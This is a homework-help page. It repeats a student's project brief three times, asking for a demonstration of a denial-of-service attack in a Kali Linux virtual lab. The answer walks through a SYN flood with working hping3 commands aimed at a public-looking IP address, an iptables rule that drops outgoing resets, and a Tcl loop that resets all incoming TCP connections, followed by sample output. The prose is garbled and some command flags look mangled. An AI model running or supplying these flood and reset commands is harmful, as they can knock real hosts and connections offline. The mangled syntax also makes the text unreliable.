Academic Integrity: tutoring, explanations, and feedback — we don’t complete graded work or submit on a student’s behalf.

Networking and Security Need help with this project. A project, that look at the

ID: 3855052 • Letter: N

Question

Networking and Security Need help with this project. A project, that look at the specifics of a DoS attack on a internet. Hence, Demonstrate, the network attack mechanism of a DoS. Tools used: Use kali Linux and the virtual internet routing lab. Contribution: The assessment of the attack associated with the DoS that might happen in any network that is connected to the internet. Hence, as a DoS on a intranet is relatively unpopular as detection is very easy, the contribution will be the assessment of loopholes in a network that might lead the network to face a DoS attack. Criteria of successful or demonstrability: For success of this project, assess the attack properly and ascertain as to what conditions and loopholes might lead to an attack on the network. The network analysis tool would allow to understand the technique deficits that a particular network might be having. For demonstrability, build a virtual representation of the network where to test it. Furthermore, try to be able to virtualization the attack using the tools that might lead to DoS on a network. Thank you
Networking and Security Need help with this project. A project, that look at the specifics of a DoS attack on a internet. Hence, Demonstrate, the network attack mechanism of a DoS. Tools used: Use kali Linux and the virtual internet routing lab. Contribution: The assessment of the attack associated with the DoS that might happen in any network that is connected to the internet. Hence, as a DoS on a intranet is relatively unpopular as detection is very easy, the contribution will be the assessment of loopholes in a network that might lead the network to face a DoS attack. Criteria of successful or demonstrability: For success of this project, assess the attack properly and ascertain as to what conditions and loopholes might lead to an attack on the network. The network analysis tool would allow to understand the technique deficits that a particular network might be having. For demonstrability, build a virtual representation of the network where to test it. Furthermore, try to be able to virtualization the attack using the tools that might lead to DoS on a network. Thank you
Networking and Security Need help with this project. A project, that look at the specifics of a DoS attack on a internet. Hence, Demonstrate, the network attack mechanism of a DoS. Tools used: Use kali Linux and the virtual internet routing lab. Contribution: The assessment of the attack associated with the DoS that might happen in any network that is connected to the internet. Hence, as a DoS on a intranet is relatively unpopular as detection is very easy, the contribution will be the assessment of loopholes in a network that might lead the network to face a DoS attack. Criteria of successful or demonstrability: For success of this project, assess the attack properly and ascertain as to what conditions and loopholes might lead to an attack on the network. The network analysis tool would allow to understand the technique deficits that a particular network might be having. For demonstrability, build a virtual representation of the network where to test it. Furthermore, try to be able to virtualization the attack using the tools that might lead to DoS on a network. Thank you

Explanation / Answer

This is for SYN flood attack.

You send a SYN, and acquire a SYN/ACK back. but its a integrate mechanism that you simply send a RESET back for the opposite aspect to close the socket.
So what you'll accomplish is simply of incomplete 3-way acknowledgment, that we tend to stop once the second acknowledgment. and also the server closes the socket…..

This command send TCP SYN packets to given ip address 192.178.12.1.

sudo hping3 -i u1 -S -p 61 192.178.12.1

Here, sudo in hping3 used to create raw packets, for raw sockets/packets the root privilege is most important on Linux.

Here, S indicates SYN flag and -p 61 indicates Target port is 61 and i u1 indicates Wait for 1 micro second between each packet

A real SYN attack is done as following:

iptables -A OUTPUT -p tcp -m tcp –tcp -flag RST -j DROP
sudo hping3 -i u1 -s ++0 -S -p 61 -c 65000 192.178.12.1

Don’t forget to remove the iptables rule afterwards, or even better, add the destination to drop RSTs, otherwise, all RSTs are dropped.

for example, to reset all the tcp connections coming in :
while {1}
{
set p [lindex [hping recv eth0] 0]
hping3 “-R” “-a” “[hping getfield ip daddr $p]” “-c” “1” “-p” “[hping getfield tcp sport $p]” “[hping getfield ip saddr $p]”
}


HPING x.x.x.x (br0 x.x.x.x): R set, 40 headers + 0 data bytes
len=46 ip=x.x.x.x ttl=117 DF id=25736 sport=61012 flags=A seq=0 win=9469 rtt=0.0 ms

— x.x.x.x hping statistic —
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms